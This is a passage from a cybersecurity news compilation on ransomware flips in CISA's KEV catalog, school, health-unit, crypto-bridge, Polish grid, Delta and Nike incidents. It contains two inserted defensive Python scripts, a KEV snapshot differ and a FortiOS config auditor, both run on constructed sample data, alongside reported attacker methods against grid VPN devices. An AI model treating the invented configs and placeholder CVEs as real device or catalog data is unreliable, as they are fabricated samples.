Of the 59 CVEs that flipped to “known” exploitation by ransomware groups last year, 27% were Microsoft vulnerabilities, Thorpe said. Just over a third (34%) involved edge and network CVEs, and 39% were CVEs published before 2023. Some 41% of the flips occurred in a single month, May 2025. The “Fastest time-to-ransomware flip” was one day, while the longest lag between a CVE’s addition to the KEV catalog and its change to “known” ransomware exploitation status was 1,353 days. The “Most flipped vulnerability type” was Authentication Bypass, at 14% of occurrences.

Ransomware Groups Target Edge Devices

Edge devices accounted for a high number of the flipped vulnerabilities, Thorpe said. Fortinet, Ivanti, Palo Alto and Check Point edge devices were among the flipped CVEs. “Ransomware operators are building playbooks around your perimeter,” he said. Thorpe said that 19 of the 59 flipped vulnerabilities “target network security appliances, the very devices deployed to protect organizations.” But he added: “Legacy bugs show up too; Adobe Reader vulnerabilities from years ago suddenly became ransomware-relevant.” Authentication bypasses and RCE vulnerabilities were the most common, “as ransomware operators prioritize ‘get in and go’ attack chains.” The breakdown by vendor of the 59 vulnerabilities “shouldn’t surprise anyone,” he said. Microsoft was responsible for 16 of the flipped CVEs, affecting SharePoint, Print Spooler, Group Policy, Mark-of-the-Web bypasses, and more. Ivanti products were affected by 6 of the flipped CVEs, Fortinet by 5 (with FortiOS SSL-VPN heap overflows standing out), and Palo Alto Networks and Zimbra were each affected by 3 of the CVEs. “Ransomware operators are economic actors after all,” Thorpe said. “They invest in exploit development for platforms with high deployment and high-value access. Firewalls, VPN concentrators, and email servers fit that profile perfectly.” He also noted that the pace of vulnerability exploitation by ransomware groups accelerated in 2025. “Today, ransomware operators are integrating fresh exploits into their playbooks faster than defenders are patching,” he said. Thorpe created an RSS feed to track the flipped vulnerabilities; it’s updated hourly.
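The snapshot-diffing approach Thorpe describes can be reproduced by anyone who keeps daily copies of the public KEV JSON feed. The script below is an added example, not code from the article or from GreyNoise; it assumes the feed's field names (dateReleased, cveID, vendorProject, dateAdded, knownRansomwareCampaignUse) and works on two constructed snapshots with placeholder CVE IDs instead of real downloads.

```python
"""Detect silent 'ransomware flips' between two CISA KEV catalog snapshots.

Added example, not from the article or GreyNoise. It relies on the field names
of the public KEV JSON feed (dateReleased, vulnerabilities[].cveID, dateAdded,
vendorProject, knownRansomwareCampaignUse); the two snapshots below are
constructed, with placeholder CVE IDs, and are not real catalog data.
"""
from __future__ import annotations

import json
from collections import Counter
from dataclasses import dataclass
from datetime import date


def _entry(cve: str, vendor: str, added: str, ransomware: str) -> dict:
    """Build a minimal KEV-shaped vulnerability record (constructed data)."""
    return {"cveID": cve, "vendorProject": vendor, "product": "ExampleProduct",
            "dateAdded": added, "knownRansomwareCampaignUse": ransomware}


# Yesterday's snapshot: one entry already 'Known', three still 'Unknown'.
SNAPSHOT_OLD = json.dumps({
    "dateReleased": "2025-05-19T14:00:00.0000Z",
    "vulnerabilities": [
        _entry("CVE-0000-0001", "VendorA", "2025-05-19", "Unknown"),
        _entry("CVE-0000-0002", "VendorB", "2021-11-03", "Unknown"),
        _entry("CVE-0000-0003", "VendorA", "2024-02-10", "Known"),
        _entry("CVE-0000-0004", "VendorC", "2023-07-01", "Unknown"),
    ],
})
# Today's snapshot: two existing entries flipped, one unchanged, one brand new.
SNAPSHOT_NEW = json.dumps({
    "dateReleased": "2025-05-20T14:00:00.0000Z",
    "vulnerabilities": [
        _entry("CVE-0000-0001", "VendorA", "2025-05-19", "Known"),
        _entry("CVE-0000-0002", "VendorB", "2021-11-03", "Known"),
        _entry("CVE-0000-0003", "VendorA", "2024-02-10", "Known"),
        _entry("CVE-0000-0004", "VendorC", "2023-07-01", "Unknown"),
        _entry("CVE-0000-0005", "VendorD", "2025-05-20", "Known"),
    ],
})


@dataclass(frozen=True)
class Flip:
    cve_id: str
    vendor: str
    date_added: date
    flip_date: date

    @property
    def lag_days(self) -> int:
        """Days between KEV addition and the ransomware status change."""
        return (self.flip_date - self.date_added).days


def _by_cve(snapshot: dict) -> dict[str, dict]:
    return {v["cveID"]: v for v in snapshot["vulnerabilities"]}


def find_flips(old_json: str, new_json: str) -> list[Flip]:
    """Entries present in both snapshots whose status went Unknown -> Known.

    Entries that are new in the later snapshot are skipped: additions are
    announced; the silent case is a status change on an existing entry.
    """
    old, new = json.loads(old_json), json.loads(new_json)
    old_idx = _by_cve(old)
    flip_date = date.fromisoformat(new["dateReleased"][:10])
    flips = []
    for cve_id, entry in _by_cve(new).items():
        prev = old_idx.get(cve_id)
        if prev is None:
            continue
        if (prev["knownRansomwareCampaignUse"] == "Unknown"
                and entry["knownRansomwareCampaignUse"] == "Known"):
            flips.append(Flip(cve_id, entry["vendorProject"],
                              date.fromisoformat(entry["dateAdded"]), flip_date))
    return flips


def summarize(flips: list[Flip]) -> dict:
    """Per-vendor counts and fastest/slowest time-to-flip for a batch of flips."""
    if not flips:
        return {"count": 0, "by_vendor": {}, "fastest_days": None, "slowest_days": None}
    lags = [f.lag_days for f in flips]
    return {"count": len(flips),
            "by_vendor": dict(Counter(f.vendor for f in flips)),
            "fastest_days": min(lags), "slowest_days": max(lags)}


if __name__ == "__main__":
    found = find_flips(SNAPSHOT_OLD, SNAPSHOT_NEW)
    for f in found:
        print(f"{f.cve_id}: Unknown -> Known after {f.lag_days} days ({f.vendor})")
    print(summarize(found))
```

Run against real consecutive daily downloads of the feed, the same functions report which existing entries changed status and how long after their KEV addition that happened.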

Ransomware Attacks Have Soared 30% in Recent Months

4 February 2026 at 14:04


Ransomware attacks have soared 30% since late last year, and they’ve continued that trend so far in 2026, with many of the attacks affecting software and manufacturing supply chains. Those are some of the takeaways of new research published by Cyble today, which also looked at the top ransomware groups, significant ransomware attacks, new ransomware groups, and recommended cyber defenses. Ransomware groups claimed 2,018 attacks in the last three months of 2025, averaging just under 673 a month to end a record-setting year. The elevated attack levels continued in January 2026, as the threat groups claimed 679 ransomware victims. In the first nine months of 2025, ransomware groups claimed an average of 512 victims a month, so the recent trend has been more than 30% above that, Cyble noted. Below is Cyble’s chart of ransomware attacks by month since 2021, which shows a sustained uptrend since mid-2025.

Chart: Ransomware attacks by month, 2021-2026 (Cyble)

Qilin Remains Top Ransomware Group as CL0P Returns

Qilin was once again the top ransomware group, claiming 115 victims in January. CL0P was second with 93 victims after claiming “scores of victims” in recent weeks in an as-yet unspecified campaign. Akira remained among the leaders with 76 attacks, and newcomers Sinobi and The Gentlemen rounded out the top five (chart below).

Chart: Top ransomware groups January 2026 (Cyble)

“As CL0P tends to claim victims in clusters, such as its exploitation of Oracle E-Business Suite flaws that helped drive supply chain attacks to records in October, new campaigns by the group are noteworthy,” Cyble said. Victims in the latest campaign have included 11 Australia-based companies spanning a range of sectors such as IT, banking and financial services (BFSI), construction, hospitality, professional services, and healthcare. Other recent CL0P victims have included “a U.S.-based IT services and staffing company, a global hotel company, a major media firm, a UK payment processing company, and a Canada-based mining company engaged in platinum group metals production,” Cyble said. The U.S. once again led all countries in ransomware attacks (chart below), while the UK and Australia faced a higher-than-normal attack volume. “CL0P’s recent campaign was a factor in both of those increases,” Cyble said.

Chart: Ransomware attacks by country January 2026 (Cyble)

Construction, professional services and manufacturing remain opportunistic targets for threat actors, while the IT industry also remains a favorite target of ransomware groups, “likely due to the rich target the sector represents and the potential to pivot into downstream customer environments,” Cyble said (chart below).

Chart: Ransomware attacks by industry January 2026 (Cyble)

Ransomware Attacks Hit the Supply Chain

Cyble documented 10 significant ransomware attacks from January in its blog post, many of which had supply chain implications. One was an Everest ransomware group compromise of “a major U.S. manufacturer of telecommunications networking equipment ... Everest claims the data includes PDF documents containing sensitive engineering materials, such as electrical schematics, block diagrams, and service subsystem documentation.” Sinobi claimed a breach of an India-based IT services company. “Samples shared by the attackers indicate access to internal infrastructure, including Microsoft Hyper-V servers, multiple virtual machines, backups, and storage volumes,” Cyble said. A Rhysida ransomware group attack on a U.S. life sciences and biotechnology instrumentation company allegedly exposed sensitive information such as engineering blueprints and project documentation. A RansomHouse attack on a China-based electronics manufacturer serving technology and automotive manufacturers may have exposed “extensive proprietary engineering and production-related data,” and “data associated with multiple major technology and automotive companies.” An INC Ransom attack on a Hong Kong–based components manufacturer for the global electronics and automotive industries may have exposed “client-related information associated with more than a dozen major global brands, plus confidential contracts and project documentation for at least three major IT companies.” Cyble also documented the rise of three new ransomware groups: Green Blood, DataKeeper and MonoLock, with DataKeeper and MonoLock releasing details on technical and payment features aimed at attracting ransomware affiliates to their operations.

Lakelands Public Health Confirms Cyberattack, Says Sensitive Data Unaffected


Lakelands Public Health has confirmed that it is actively responding to a cyberattack discovered on January 29, 2026, which affected some of its internal systems. The organization is sharing information about the Lakelands Public Health cyberattack incident proactively to maintain transparency and public trust.  Immediately after detecting the breach, Lakelands Public Health implemented its incident response protocols, secured affected systems, and engaged a leading cybersecurity firm to support the investigation, containment, and recovery efforts. Experts are working closely with the organization to ensure that all systems are restored safely and efficiently.  While restoration efforts are underway, some programs and services may experience temporary disruptions. The organization has committed to directly contacting any individuals or partners affected by interruptions. 

Critical Public Health Data Remains Secure 

Initial investigations indicate that systems managing sensitive public health information, including infectious disease data, immunization records, and sexual health information, were not impacted by the Lakelands Public Health cyberattack. Lakelands Public Health has emphasized that protecting personal information remains a top priority as it continues essential public health operations.  Dr. Thomas Piggott, Medical Officer of Health and Chief Executive Officer of Lakelands Public Health, said, 
“Our priority response to this event is protecting the information entrusted to us and maintaining continuity of critical public health services. By taking a proactive approach and engaging specialized expertise, we are working diligently to restore systems and keep our community informed.” 
The organization serves Peterborough city and county, Northumberland and Haliburton counties, Kawartha Lakes, and the First Nations communities of Curve Lake and Alderville. The cyberattack prompted a review of all systems that could potentially be affected, ensuring that any vulnerabilities are mitigated. 

Lakelands Public Health Cyberattack Investigation

Lakelands Public Health has noted that the investigation into the cyberattack is ongoing. While no personal or health information appears to have been compromised, the organization has committed to alerting affected parties should any issues arise as the review continues.  Officials have advised that during the restoration period, certain programs and services may remain temporarily offline, and affected individuals will receive direct notifications.  The health unit is also closely monitoring its IT infrastructure for unusual activity, and administrators are implementing additional safeguards, including enhanced network monitoring and access controls. These measures are aimed at minimizing risk and ensuring the integrity of public health data during the recovery process. 

Proactive Measures Strengthen Cybersecurity for Lakelands Public Health 

Residents, partners, and staff are encouraged to remain patient and vigilant as Lakelands Public Health continues to prioritize security, transparency, and the continuity of services. Updates regarding the cyberattack and ongoing recovery efforts are available at LakelandsPH.ca.  In response to the incident, Lakelands Public Health has reinforced its commitment to cybersecurity. By engaging specialized expertise and deploying additional monitoring and response tools, the organization aims to reduce the risk of future incidents.  Dr. Piggott reinforced the importance of public confidence, stating that the organization will continue to communicate openly and ensure that all necessary steps are taken to protect sensitive information while maintaining public health services without interruption. 

Berchem School Hit by Cyberattack as Hackers Target Parents With €50 Ransom Demand

3 February 2026 at 01:06


A cyberattack on Berchem school has raised serious concerns after hackers demanded ransom money not only from the institution but also directly from students’ families. The Berchem school cyberattack incident occurred at the secondary school Onze-Lieve-Vrouwinstituut Pulhof (OLV Pulhof), where attackers disrupted servers and later threatened to release sensitive information unless payments were made. The case, confirmed by the public prosecutor’s office and first reported by ATV, highlights the growing threat of ransomware attacks on schools, where cybercriminals increasingly target educational institutions due to their reliance on digital systems and the sensitive data they store.

Cyberattack on Berchem School Disrupted Servers

The Berchem school hacking incident took place shortly after the Christmas holidays, in early January. According to reports, the school’s servers were taken offline, causing disruption to internal systems. Hackers reportedly demanded a ransom from the school soon after the breach. However, the institution refused to comply with the demands. This decision appears to have triggered an escalation in the attackers’ strategy, shifting pressure onto parents.

School Files Police Complaint After Ransom Demand

Following the cyberattack on Berchem school, OLV Pulhof acted quickly by contacting law enforcement. The school filed a formal complaint against unknown persons and brought in the police’s Regional Computer Crime Unit (RCCU) to respond to the incident. In addition to involving authorities, the school also moved to secure its digital infrastructure. Out of concern for student safety and data protection, the institution reportedly set up a new, secure network environment soon after the breach. The incident is now under investigation by the Federal Judicial Police.

Hackers Target Parents With €50 Per Child Ransom Demand

This week, the cybercriminals expanded their attack by sending threatening messages directly to parents of students. The hackers demanded a ransom of 50 euros per child, warning that private information such as addresses or photos could be released if the payment was not made. A student described the situation, saying that the school required everyone to change passwords and warned students not to click on suspicious links. “We had to change all our passwords at school, otherwise they would release our addresses or photos,” the student said. Another student added that their father received an email demanding payment, which caused fear and uncertainty. “My dad also got an email last night. That scares me a little. They were asking for 50 euros per child.” This tactic reflects a disturbing trend in school cyberattacks, where criminals attempt to exploit families emotionally and financially.

Parents Advised Not to Pay and Not to Click

The school has strongly advised parents not to respond to the ransom demands. Families were told not to pay, and more importantly, not to click on any links or attachments included in the hackers’ communications, as these could lead to further compromise or malware infections. Cybersecurity experts generally warn against paying ransoms, as it does not guarantee that stolen data will be deleted or that systems will be restored. Paying can also encourage attackers to continue targeting schools and vulnerable communities.

Classes Continue Despite Cybersecurity Incident

Despite the attack, lessons at OLV Pulhof have continued. While the school’s servers were initially down, it appears that temporary solutions and new systems allowed teaching to proceed. However, the full consequences of the hacking have not yet been disclosed. It remains unclear what data may have been accessed or whether any personal information was stolen. Educational institutions often store sensitive records, including student details, contact information, and internal documents, making them attractive targets for cybercriminal groups.

Rising Concern Over Ransomware Attacks on Schools

The cyberattack on the Berchem secondary school is part of a wider pattern of increasing cybercrime targeting schools across Europe. Schools often face limited cybersecurity budgets, older IT systems, and large networks of users, making them easier to infiltrate than larger corporate organizations. Attacks like this demonstrate how ransomware incidents can go beyond technical disruption, affecting families and creating fear in local communities.

Investigation Ongoing

Authorities have not yet identified who is behind the attack. The Federal Judicial Police continue to investigate, while the school works to strengthen its systems and protect students and staff. For now, parents are being urged to remain cautious, avoid engaging with the attackers, and report any suspicious communications to law enforcement. The Berchem school cyberattack serves as a reminder that cybersecurity in schools is no longer optional, but essential for protecting students, families, and the education system itself.

CrossCurve Bridge Hacked for $3M After Smart Contract Validation Vulnerability Exploited


CrossCurve bridge, formerly known as EYWA, has suffered a major cyberattack after attackers exploited a vulnerability in its smart contract infrastructure, draining approximately $3 million across multiple blockchain networks.   The CrossCurve team confirmed the incident on Sunday, stating that its bridge infrastructure was “currently under attack” and warning users to immediately stop interacting with the protocol.   “Our bridge is currently under attack, involving the exploitation of a vulnerability in one of the smart contracts used,” CrossCurve said in a post on X. “Please pause all interactions with CrossCurve while the investigation is ongoing.” 

Spoofed Cross-Chain Messages Used to Bypass Validation Checks 

Blockchain security account Defimon Alerts identified the root cause of the cyberattack as a gateway validation bypass within CrossCurve’s ReceiverAxelar contract. According to the analysis, the contract lacked a critical validation check, allowing any user to call the expressExecute function with a spoofed cross-chain message.

Figure: CrossCurve exploit details (Source: Defimon Alerts on X)

By exploiting this flaw, attackers were able to bypass the intended gateway validation logic and trigger unauthorized token unlocks on the protocol’s PortalV2 contract. As a result, funds were drained without proper authorization. The exploit impacted the CrossCurve bridge across multiple networks, highlighting the risks associated with cross-chain messaging systems. Data from Arkham Intelligence, shared by Defimon Alerts, shows that the PortalV2 contract’s balance dropped from roughly $3 million to nearly zero around January 31. Transaction data indicates that the exploit unfolded across several chains, rather than being confined to a single network.

CrossCurve Cyberattack Revives Concerns Over Bridge Security

CrossCurve, previously branded as EYWA, operates a cross-chain decentralized exchange and liquidity protocol developed in partnership with Curve Finance. The protocol relies on what it calls a “Consensus Bridge,” which routes transactions through multiple independent validation mechanisms, including Axelar, LayerZero, and the EYWA Oracle Network. The design was intended to reduce reliance on any single system and minimize points of failure.  In its documentation, CrossCurve had highlighted this architecture as a key security advantage, stating that “the probability of several crosschain protocols getting hacked at the same time is near zero.” The recent cyberattack, however, demonstrated that a vulnerability in a single smart contract can still compromise the broader system, regardless of the number of validation layers involved.  The project has prominent backing in the decentralized finance ecosystem. Curve Finance founder Michael Egorov became an investor in the protocol in September 2023, and CrossCurve later announced that it had raised $7 million from venture capital firms.  Following the exploit, Curve Finance issued a warning to users with exposure to EYWA-related pools. “Users who have allocated votes to Eywa-related pools may wish to review their positions and consider removing those votes,” Curve Finance wrote on X. “We continue to encourage all participants to remain vigilant and make risk-aware decisions when interacting with third-party projects.”  Security researchers compared the CrossCurve bridge exploit to earlier incidents in the sector. The vulnerability bears similarities to the 2022 Nomad bridge hack, in which attackers drained approximately $190 million after discovering a flawed validation mechanism. That exploit escalated rapidly, with hundreds of wallet addresses copying the attack once it became public. 

Default Credentials, Vulnerable Devices Exploited in Polish Energy Grid Attack

30 January 2026 at 14:09


A cyberattack by Russian state-sponsored threat actors that targeted at least 30 wind and solar farms in Poland relied on default credentials, lack of multi-factor authentication (MFA) and outdated and misconfigured devices, according to a new report on the December 2025 incident by CERT Polska, the Polish computer emergency response team. The new report underscores the difficulty of securing critical infrastructure systems, which frequently rely on outdated devices that are difficult to update. In the Polish energy grid attack, credential and configuration errors compounded the vulnerabilities. CERT Polska attributed the campaign to Static Tundra, a group linked to Russia’s Federal Security Service (FSB) Center 16 unit, but a Dragos report on one of the Polish energy grid incidents attributed the activity to the ELECTRUM subgroup of Sandworm, a threat group linked to the GRU, Russia’s military intelligence service, that was implicated in destructive attacks on the Ukraine power grid a decade ago. The Polish report notes that the DynoWiper malware used in the latest attacks “contains certain similarities to wiper-type tools associated with the activity cluster publicly known as ‘Sandworm’ and ‘SeashellBlizzard,’” but the report adds, “Despite identifying commonalities in behavioral characteristics and overall architecture, the level of similarity is too low to attribute DynoWiper to previously used wiper families.” The attackers’ activities began between March and May 2025, months before the December 29 attack.

Polish Energy Grid Attack Could Have Been Worse

The CERT Polska report said the December attack “resulted in a loss of communication between the facilities and distribution system operators (DSOs), but it did not affect ongoing electricity generation” or impact the stability of the Polish power system. “It should be noted, however, that given the level of access obtained by the attacker, there was a risk of causing a disruption in electricity generation at the affected facilities,” the report said. “Even if such a disruption had occurred, analyses indicate that the combined loss of capacity across all 30 facilities would not have affected the stability of the Polish power system during the period in question.” Dragos noted that in its incident response case, the attackers “gained access to operational technology systems critical to grid operations and disabled key equipment beyond repair at the site,” an attack the company called “very alarming.” “This is the first major cyber attack targeting distributed energy resources (DERs), the smaller wind, solar, and CHP facilities being added to grids worldwide,” Dragos said. “Unlike the centralized systems impacted in electric grid attacks in 2015 and 2016 in Ukraine, these distributed systems are more numerous, require extensive remote connectivity, and often receive less cybersecurity investment. This attack demonstrates they are now a valid target for sophisticated adversaries.” “An attack on a power grid at any time is irresponsible, but to carry it out in the depths of winter is potentially lethal to the civilian population dependent on it,” Dragos added. “It is unfortunate that those who attack these systems appear to deliberately choose timing that maximizes impact on civilian populations.”

Credential and Configuration Mistakes Exploited in Polish Energy Grid Attack

In the Polish energy grid attack, the attackers exploited a long list of outdated and misconfigured devices and default and static credentials that were not protected by MFA. The Polish report noted that in each affected facility, a FortiGate device served as both a VPN concentrator and a firewall. “In every case, the VPN interface was exposed to the Internet and allowed authentication to accounts defined in the configuration without multi‑factor authentication,” the report said.

The report noted that it is common practice in the industry to reuse the same accounts and passwords across multiple facilities. “In such a scenario, the compromise of even a single account could have enabled the threat actor to identify and access other devices where the same credentials were used,” CERT Polska said. The networks of the targeted facilities often contained segregated VLAN subnets, but because the attackers held administrative privileges on the FortiGate device, “These privileges were likely used to obtain credentials for a VPN account with access to all subnets,” the report said. “Even if no such account had existed, the attacker, having administrator-level access, could have modified the device configuration to enable equivalent access.”

In one incident, the attacker gained access to the SSL‑VPN portal service of a FortiGate device located at the organization’s network perimeter by using “multiple accounts that were statically defined in the device configuration and did not have two‑factor authentication enabled.” After gaining access, the attackers used bookmarks defined in the configuration file to access jump hosts via RDP, the report said. Analysis of a FortiGate device configuration file indicated that some users had statically configured target user credentials, which enabled connections to the jump host from the SSL‑VPN portal without the need for additional local or domain user credentials.

The attacker also made configuration changes, including a new rule that allowed connections using any protocol and IP address to a specified device, and disabled network traffic logging. Using the Fortinet scripting mechanism, the attacker also created scripts for further credential exfiltration and for modifying security settings, which were executed weekly. The report also detailed numerous out-of-date or misconfigured operational technology (OT) devices, many with default credentials, such as Hitachi and Mikronika controllers, and secure update features that were not enabled. In the case of Hitachi Relion 650 v1.1 IEDs, the default FTP account had not been disabled in accordance with the manufacturer’s recommendations. Where an HMI used unique credentials for the local administrator account, “unsuccessful password‑breaking attempts were observed. In those cases, the HMI was not damaged.” The attackers also pivoted to cloud services, the report said.
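The FortiGate findings above (local VPN accounts without two-factor, SSL-VPN bookmarks carrying stored jump-host credentials, an any/any policy with logging disabled, scheduled auto-scripts, and the same account name reused across facilities) can all be checked offline against a configuration backup. The script below is an added example, not CERT Polska's or Fortinet's tooling; the two site configurations it audits are constructed and only approximate FortiOS's config/edit/set/next/end syntax, and the section and key names it looks for (`user local`, `two-factor`, `vpn ssl web user-bookmark`, `logon-password`, `firewall policy`, `logtraffic`, `system auto-script`) are assumptions about that format. Because FortiOS omits default values from dumps, a local user with no `set two-factor` line is treated as having two-factor disabled.

```python
"""Offline audit of FortiOS-style config dumps for the weaknesses CERT Polska
describes. Constructed example; not CERT Polska's or Fortinet's tooling, and the
sample configs are invented and only approximate FortiOS syntax."""
import shlex

# Constructed dumps (assumed layout, not real device output). FortiOS omits
# defaults, so a local user with no 'set two-factor' line has it disabled.
SITE_A = """
config user local
    edit "ops-shared"
        set passwd ENC AAAA
    next
    edit "svc-admin"
        set two-factor fortitoken
    next
end
config vpn ssl web user-bookmark
    edit "ops-group"
        config bookmarks
            edit "jumphost"
                set apptype rdp
                set host "10.10.20.5"
                set logon-user "jumpadmin"
                set logon-password ENC BBBB
            next
        end
    next
end
config firewall policy
    edit 1
        set srcaddr "all"
        set dstaddr "OT-HMI"
        set service "RDP"
        set action accept
        set logtraffic all
    next
    edit 99
        set srcaddr "all"
        set dstaddr "all"
        set service "ALL"
        set action accept
        set logtraffic disable
    next
end
config system auto-script
    edit "sync"
        set interval 604800
        set script "get system status"
    next
end
"""
SITE_B = """
config user local
    edit "ops-shared"
        set passwd ENC CCCC
        set two-factor email
    next
end
"""


def parse_fortios(text):
    """Parse config/edit/set/next/end nesting into
    {section: {entry: {key: [values], "__sub__": {section: ...}}}}."""
    lines = [l for l in (x.strip() for x in text.splitlines()) if l]
    pos = 0

    def section():  # called after a 'config ...' line; consumes through 'end'
        nonlocal pos
        entries = {}
        while pos < len(lines):
            tok = shlex.split(lines[pos]); pos += 1
            if tok[0] == "end":
                break
            if tok[0] == "edit":
                entries[tok[1]] = entry()
        return entries

    def entry():  # called after an 'edit ...' line; consumes through 'next'
        nonlocal pos
        e = {}
        while pos < len(lines):
            tok = shlex.split(lines[pos]); pos += 1
            if tok[0] == "next":
                break
            if tok[0] == "set":
                e[tok[1]] = tok[2:]
            elif tok[0] == "config":  # nested table, e.g. bookmarks
                e.setdefault("__sub__", {})[" ".join(tok[1:])] = section()
        return e

    top = {}
    while pos < len(lines):
        tok = shlex.split(lines[pos]); pos += 1
        if tok[0] == "config":
            top[" ".join(tok[1:])] = section()
    return top


def audit(cfg, site):
    """Return findings for one device config, mirroring the report's points."""
    f = []
    for name, u in cfg.get("user local", {}).items():
        if u.get("two-factor", ["disable"]) == ["disable"]:
            f.append(f"{site}: user {name} has no two-factor")
    for grp, g in cfg.get("vpn ssl web user-bookmark", {}).items():
        for bm, b in g.get("__sub__", {}).get("bookmarks", {}).items():
            if "logon-password" in b:  # portal reaches the jump host with no second login
                f.append(f"{site}: bookmark {grp}/{bm} stores credentials for "
                         f"{b.get('apptype', ['?'])[0]} to {b.get('host', ['?'])[0]}")
    for pid, p in cfg.get("firewall policy", {}).items():
        if p.get("action") != ["accept"]:
            continue
        if p.get("srcaddr") == ["all"] and p.get("dstaddr") == ["all"] and p.get("service") == ["ALL"]:
            f.append(f"{site}: policy {pid} accepts any source, destination and service")
        if p.get("logtraffic") == ["disable"]:
            f.append(f"{site}: policy {pid} has traffic logging disabled")
    for name, s in cfg.get("system auto-script", {}).items():
        f.append(f"{site}: auto-script {name} runs every {s.get('interval', ['?'])[0]}s; verify against change records")
    return f


def shared_accounts(configs):
    """Local account names defined on more than one device (credential-reuse indicator)."""
    seen = {}
    for site, cfg in configs.items():
        for name in cfg.get("user local", {}):
            seen.setdefault(name, []).append(site)
    return {n: s for n, s in seen.items() if len(s) > 1}


def audit_sample():
    configs = {"site-a": parse_fortios(SITE_A), "site-b": parse_fortios(SITE_B)}
    findings = [x for site, cfg in configs.items() for x in audit(cfg, site)]
    for name, sites in shared_accounts(configs).items():
        findings.append(f"account {name} defined on {', '.join(sites)}: one compromise may open all")
    return findings
```

Run `audit_sample()` (or feed real backups into `parse_fortios` and `audit`) to get one line per finding; the shared-account check only compares user names, since FortiOS stores each device's password hashes with device-specific encryption, so identical passwords cannot be confirmed from the dumps alone.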

Major Cyberattack Cripples Russia’s Alarm and Vehicle Security Provider Delta

28 January 2026 at 00:58

cyberattack on Delta

A cyberattack on Delta, a Russian provider of alarm and security systems for homes, businesses, and vehicles, has disrupted operations and triggered widespread service outages, leaving many customers unable to access critical security functions. Delta, which serves tens of thousands of users across Russia, confirmed the attack on Monday, stating that it had faced a major external assault on its IT infrastructure. The disruption has affected both online services and customer communication channels, raising concerns about the resilience of connected security platforms.

Cyberattack on Delta Security Systems Causes Major Outage

In an official statement, the company emphasized its position in the market and its ongoing investments in cybersecurity. Delta said: “On January 26, DELTA experienced a large-scale external attack on its IT infrastructure aimed at disrupting the company's services.” The company added that some services were temporarily unavailable, but insisted there were no immediate signs of customer data exposure. “At this time, no signs of a compromise of customer personal data have been detected.” Delta also apologized to customers and said restoration efforts were underway with the help of specialized experts.

Delta Struggles to Restore Services After Cyberattack

Delta marketing director Valery Ushkov provided additional details in a video address, acknowledging the large scale of the incident. He said: “Our architecture was unable to withstand a well-coordinated attack coming from outside the country.” Ushkov noted that recovery was taking longer than expected because the company was still facing the risk of follow-up attacks while attempting to restore backups. As of Tuesday, Delta’s website and phone lines remained offline. With traditional communication channels down, the company has been forced to issue updates through its official page on VKontakte, Russia’s largest social media platform.

Customers Report Alarm Failures and Vehicle Access Issues

The disruption has had direct consequences for customers who rely on Delta’s systems for everyday safety and mobility. Russian-language Telegram outlet Baza reported that shortly after the incident, users began complaining that car alarm systems could not be turned off and, in some cases, that vehicles could not be unlocked. Newspaper Kommersant also reported ongoing failures despite Delta’s assurances that most services were operating normally. Users described serious malfunctions, including remote vehicle start features failing, doors locking unexpectedly, and engines shutting down while in motion. In addition to vehicle-related issues, customers reported that alarm systems in homes and commercial buildings switched into emergency mode and could not be deactivated. Recorded Future News said it could not independently verify these claims.

Data Leak Claims Surface After Delta Cyberattack

Although Delta maintains that no customer data was compromised, uncertainty remains. An unidentified Telegram channel claiming to be operated by the attackers published an archive it alleges contains stolen information from Delta systems. However, the authenticity of the material and the identity of the hackers have not been independently verified. The cyberattack on Delta has increased anxiety among customers, particularly because Delta’s mobile app, launched in 2020, is widely used for tracking vehicles and managing alarm functions. According to Auto.ru, the app is compatible with most cars and can store payment data, making some users wary of potential financial exposure if internal systems were breached.

Broader Pattern of IT Disruptions in Russia

The Delta cyberattack occurred on the same day that a separate large-scale outage affected booking and check-in systems used by Russian airlines and airports. Airlines reported temporary disruptions to ticket sales, refunds, and rebooking after problems were detected in aviation IT platforms. While the two incidents have not been officially linked, the timing highlights growing instability in critical digital infrastructure. No known hacking group has claimed responsibility for the cyberattack on Delta so far. It also remains unclear whether the incident was a relatively limited distributed denial-of-service (DDoS) attack or something more severe, such as ransomware or destructive malware. For now, Delta says the situation is manageable and expects services to return soon, but customer concerns continue as outages persist and unverified leak claims circulate.

What Is Doxxing? How It Happens, and How to Stay Safe

27 January 2026 at 05:11

In today’s digital world, our private information is more accessible than ever. The conveniences of the internet come with a significant threat to our privacy and security. Doxxing is one such threat: publicly revealing private, sensitive, or identifying information about an individual without their consent. This information includes home addresses, emails, phone numbers, workplace...

The post What Is Doxxing? How It Happens, and How to Stay Safe appeared first on EncryptedFence by Certera - Web & Cyber Security Blog.

The post What Is Doxxing? How It Happens, and How to Stay Safe appeared first on Security Boulevard.

Nike Probes Possible Cybersecurity Incident Following Dark Web Claims

Nike cyberattack

Nike has confirmed that it is investigating a potential cybersecurity incident after claims surfaced online that its internal data may have been leaked by a cybercrime group. The same group, known for extortion-driven attacks against other companies, had previously claimed the Nike cyberattack on its dark web site. Nike acknowledged the potential incident, stating, “We always take consumer privacy and data security very seriously. We are investigating a potential cybersecurity incident and are actively assessing the situation.” The company has not yet disclosed whether the cyberattack on Nike involved customer, employee, or partner data.

Hacker Group Claims the Nike Cyberattack

The allegations stem from a ransomware group known as World Leaks, which claimed on its website that it had published 1.4 terabytes of data allegedly tied to Nike’s business operations. The group did not specify what types of files or information were included in the purported leak. The Cyber Express reached out to Nike for further details regarding the reported cyberattack. However, as of the time of writing, the company had not shared any additional updates or clarification about the incident or its potential impact. World Leaks is an extortion-focused cybercrime group that steals corporate data to pressure victims into paying ransoms, threatening public disclosure if demands are not met. The group emerged in 2025 after rebranding from Hunters International, a ransomware gang active since 2023. Following increased law enforcement scrutiny, the group reportedly abandoned traditional file-encryption tactics and shifted entirely to data theft and extortion. It has since claimed hundreds of victims.

Potential Partner Impact and Broader Industry Context 

It remains unclear whether the alleged Nike data breach affected information belonging to any of Nike’s major wholesale partners. The company works closely with large retailers such as Dick’s Sporting Goods, Macy’s, and JD Sports. The reported cyberattack on Nike comes as data breaches continue to disrupt major corporations worldwide. High-profile cyber incidents in 2023 and 2024 affected companies including MGM Resorts International, Clorox, and UnitedHealth Group. MGM disclosed losses of at least $100 million tied to its attack, while Clorox reported a decline of more than $350 million in quarterly net sales following its breach. The incident also follows similar developments within the sportswear sector. TechCrunch recently reported that Under Armour launched an investigation after 72 million customer email addresses were posted online.

Nike’s Business Challenges Amid Cybersecurity Concerns 

